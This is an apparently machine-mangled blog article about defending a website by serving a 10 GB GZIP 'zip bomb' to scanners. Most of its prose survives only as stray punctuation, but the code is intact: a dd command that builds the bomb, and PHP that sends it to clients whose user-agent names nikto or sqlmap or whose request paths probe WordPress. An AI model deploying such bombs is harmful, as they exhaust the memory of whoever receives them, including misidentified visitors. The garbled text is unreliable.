Geekly Articles each Day
📜 ⬆️ ⬇️

Protecting your site with ZIP bombs

Old methods still work


[Update] Now I'm on some sort of special services list because I wrote an article about some kind of “bomb”, right?

If you have ever hosted a website or administered a server, you probably know well about bad people who are trying to do various bad things with your property.

When I, at the age of 13, first started my little Linux box with SSH access, I watched the logs and saw IP addresses every day (mostly from China and Russia) that tried to connect to my sweet little box (which In fact, it was an old ThinkPad T21 laptop with a broken display buzzing under the bed). I reported these IPs to their providers.
')
In fact, if you have a Linux server with open SSH, you can see for yourself how many connection attempts occur every day:

grep 'authentication failures' /var/log/auth.log


,

Wordpress


, , - Wordpress, , , wp-admin .

, - - .


Nikto

- , . …

?


IDS Fail2ban ZIP- .

— ZIP-?


, ZIP , , , . , .

42.zip, 4,5  (4 500 000 ) 42 . ( ), , , .

ZIP- ?


, - ZIP, GZIP.

10- GZIP, . , .

dd if=/dev/zero bs=1M count=10240 | gzip > 10G.gzip




, 10 . , .

PHP-, .

<?php
//prepare the client to recieve GZIP data. This will not be suspicious
//since most web servers use GZIP by default
header("Content-Encoding: gzip");
header("Content-Length: ".filesize('10G.gzip'));
//Turn off output buffering
if (ob_get_level()) ob_end_clean();
//send the gzipped file to the client
readfile('10G.gzip');

!

:

<?php
$agent = filter_input(INPUT_SERVER, 'HTTP_USER_AGENT');

//check for nikto, sql map or "bad" subfolders which only exist on wordpress
if (strpos($agent, 'nikto') !== false || strpos($agent, 'sqlmap') !== false || startswith($url,'wp-') || startswith($url,'wordpress') || startswith($url,'wp/'))
{
      sendBomb();
      exit();
}

function sendBomb(){
        //prepare the client to recieve GZIP data. This will not be suspicious
        //since most web servers use GZIP by default
        header("Content-Encoding: gzip");
        header("Content-Length: ".filesize('10G.gzip'));
        //Turn off output buffering
        if (ob_get_level()) ob_end_clean();
        //send the gzipped file to the client
        readfile('10G.gzip');
}

function startsWith($a, $b) { 
    return strpos($a, $b) === 0;
}

, , -, , , user-agent.

… , ?


IE 11, IE
Chrome,
Edge, ,
Nikto,
SQLmap,
Safari, , ...
Chrome (Android),

( //, , , )


Chrome

, !

Source: https://habr.com/ru/post/332580/

More articles:


All Articles